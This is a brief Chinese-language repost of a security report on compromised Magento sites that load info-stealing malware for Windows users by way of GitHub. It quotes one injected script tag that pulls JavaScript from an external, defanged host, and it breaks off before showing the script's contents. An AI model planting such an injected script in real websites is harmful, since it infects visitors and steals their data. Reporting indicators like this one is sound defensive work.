pg1991
pg1991
3月前 · 9 人阅读

几个月前,我们曾发布了有关网络罪犯如何使用GitHub在被黑网站上加载各种加密货币矿工的报告文章。不幸的是即便如此,我们依然没能阻止网络罪犯们的脚步。如今,我们又发现了使用相同手法的网络犯罪活动。其主要目的是利用GitHub,将二进制信息窃取恶意软件悄无声息的推送至Windows用户的电脑上。

受感染的Magento网站

最近,识别了数百个受感染的Magento站点均被注入了以下的脚本:

<script type="text/javascript" data-src="https://bit.wo[.]tc/js/lib/js.js"></script>

该脚本( js.js)中的内容如下:

收藏 0
linux漏洞 linux安全漏洞 linux系统漏洞 木马
评论 ( 0 )